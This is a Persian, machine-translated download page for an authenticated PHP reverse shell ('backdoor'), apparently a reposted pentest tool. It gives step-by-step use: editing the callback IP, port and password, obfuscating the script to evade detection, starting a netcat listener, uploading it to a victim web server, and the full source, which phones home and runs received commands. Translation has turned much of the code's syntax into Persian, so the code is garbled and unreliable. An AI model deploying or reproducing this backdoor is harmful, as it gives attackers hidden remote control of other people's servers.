معکوس شل V1.0 پی اچ پی – قابلیت تأیید هویت
محصول توسط:
اشفق انصاری
نسخه:
1.0
قیمت:
رایگان

نقد و مرور:
رتبه:
5
بر اکتبر 9, 2012
تاریخ و زمان آخرین اصلاح شده:ژانویه 18, 2013

خلاصه:

معکوس اتصال PHP شل با قابلیت احراز هویت داخلی. اسکریپت بسیار معروف برای محافظت از درپشتی خود را.

معرفی

 

این ابزار برای pentest وضعیت که در آن شما آپلود دسترسی به یک وب سرور است که در حال اجرا پی اچ پی طراحی شده.
بارگذاری این اسکریپت به جایی در ریشه وب و سپس آن را با دسترسی به URL مناسب را در مرورگر خود اجرا کنید. این اسکریپت یک اتصال TCP خروجی از وب سرور به یک میزبان و پورت تعریف شده در اسکریپت باز. موظف است به این اتصال TCP خواهد بود پوسته.
 

این خواهد بود که یک پوسته تعاملی مناسب که در آن شما می توانید برنامه interective مانند اجرا شبکه راه دور و SSH.
این پوسته دارای ویژگی های احراز هویت inbuilt که از شخص دیگری جلوگیری از سوء استفاده از درپشتی خود را.
از وب مبتنی بر فرم، پوسته متفاوت است که به شما اجازه می دهد به ارسال یک فرماندهی واحد, سپس شما خروجی بازگشت.
 

اصلاح منبع

 

1
2
3
$آی پی = "127.0.0.1"; #تغییر به IP عمومی شما
$درگاه = 4444;      #این تغییر به بندر شما
$رمز عبور = base64_decode("aGFja3N5c3RlYW0="); #پیش فرض رمز عبور: hacksysteam (MD5)

 

تغییر ارزش به عنوان در نیاز و موقعیت خود را.
 

مبهم و تاریک کردن منبع

 

هنگامی که شما انجام داده اند اصلاح, شما ممکن است هر آنلاین استفاده کنید PHP Obfuscator برای رمزگذاری اسکریپت پی اچ پی.
 

مثال: http://www.codeeclipse.com/
 

قبل از obfuscating, لطفا تغییر مقادیر فوق با توجه به نیازهای شما.
 

راه اندازی راحت شنونده

 

شروع یک شنونده راحت در یک میزبان و پورت خواهد شد که توسط وب سرور در دسترس.
استفاده از پورت در اینجا به عنوان در اسکریپت پوسته معکوس برای مثال مشخص شده است (4444):
 

1
ریشه @ BT:~ # NC -lvvp 4444

 

آپلود اسکریپت و اجرای آن

 

با استفاده از این آسیب پذیری شما را در وب سایت کشف, آپلود reverse_shell.php.
اجرای اسکریپت به سادگی با در حال دیدن سایت به فایل تازه آپلود شده را در مرورگر وب خود.
 

1
HTTP://<IP قربانی>/<بارگذاری راه>/reverse_shell.php

 

یادداشت: شما هیچ خروجی بر روی صفحه وب نمی بینم, آن را در حالت انتظار ادامه اگر موفق آن.
 

غارت با پوسته شما

 

کد منبع

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?پی اچ پی
###################################################
#               معکوس شل V1.0 #
#             قابلیت تأیید هویت #
#                                                 #
#            Hacksys تیم - Panthera #
#             نویسنده: اشفق انصاری #
#            hacksysteam@hotmail.com #
#          HTTP://hacksys.vfreaks.com #
#              طراحی شده برای لینوکس #
#             با تشکر از lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('max_execution_time',0);

$VERSION = "1.0";
$آی پی = "127.0.0.1"; #تغییر این
$درگاه = 4444;      #تغییر این
$رمز عبور = base64_decode(&quot;aGFja3N5c3RlYW0="); #پیش فرض رمز عبور: hacksysteam (MD5)

$پرچم = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ ___ _ _
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    شل معکوس در PHP
    نویسنده: اشفق انصاری
   hacksysteam@hotmail.com
 HTTP://hacksys.vfreaks.com /\N\N"
);

$PWD = shell_exec("PWD");
$sysinfo = shell_exec("دستور uname-");
$شناسایی = shell_exec(شناسایی | برش د "(" -F 2 | برش د ")" -F 1);
$تاریخ = shell_exec("تاریخ");
$فقط = 1337;
$اطلاعات =
("
اطلاعات سیستم:\N$sysinfo
دایرکتوری جاری کار: $PWD
گروه کاربری: $شناسایی
تاریخ و زمان فعلی: $تاریخ\N
"
);

چاپ "\Nتلاش برای اتصال به: $آی پی بر روی پورت $درگاه ...\N\N";

$sockfd = fsockopen($آی پی , $درگاه , $errno, $errstr );

اگر($errno != 0)
  {
    چاپ "\N****** خطا رخ داده است ******\NNnumber خطا: $errno\Nرشته خطا: $errstr\N\N";
    die(0);
  }
دیگر اگر (!$sockfd)
  {
    چاپ "کشنده : هنگامی که در تلاش برای اتصال خطای غیر منتظره رخ داد شد!\N";
  }
دیگر
  {
    چاپ "متصل به: $آی پی بر روی پورت $درگاه ...\N\N";
    fputs ($sockfd , $پرچم);
    fputs($sockfd ,"را وارد کنید رمز عبور: ");
    $getpass = تر و تمیز(fgets($sockfd, strlen($رمز عبور) + 2));

    اگر ($getpass == $رمز عبور)
    {
      fputs($sockfd, "\Nموفق تایید..\N");
      fputs($sockfd, $اطلاعات);
      در حین(!EOF($sockfd))
      {
    $cmdPrompt = تر و تمیز($شناسایی) . "@" . تر و تمیز($آی پی) . ":~" . تر و تمیز($PWD) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $فرمان = تر و تمیز(fgets($sockfd, $فقط));
        اگر (تر و تمیز($فرمان) == "خروج")
    {
      fputs($sockfd ,"\Nسقط توسط کاربر ... در خروج از ..." );
      fclose($sockfd);
      die(0);
    }
    fputs($sockfd , "\N" . shell_exec($فرمان) . "\N");
      }
      fclose($sockfd);
      die(0);
    }
    دیگر
    {
      fputs($sockfd ,"\Nنامعتبر رمز عبور ... ترک ...");
      fclose($sockfd);
      die(0);
    }
  }
?>

 

تصویر

 


 

دانلود معکوس شل V1.0 PHP – قابلیت تأیید هویت

 

Reverse_Shell_v1.0.zip

 
 
 

20,998 نمایش کل, 6 بازدید های امروز

دو زبانه زیر محتوای زیر تغییر.

اشفق انصاری

محقق امنیتی
اشفق انصاری بنیانگذار است HackSys تیم کد نام "Panthera". او یک محقق امنیتی با تجربه در جنبه های مختلف امنیت اطلاعات می باشد. او نویسنده "HackSys افراطی درایور آسیب پذیر" و "شل کد از مرگ". او همچنین نوشته شده است و whitepapers مختلف در سطح پایین بهره برداری نرم افزار منتشر شده. علاقه او نهفته در هسته "بهره برداری سطح پایین", "مهندسی معکوس", "تجزیه و تحلیل برنامه" و "ترکیبی fuzzing در". او fanboy هوش مصنوعی و یادگیری ماشین است. او به فصل برای است تهی پونا.

پاسخ دهید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخشهای موردنیاز علامتگذاری شدهاند *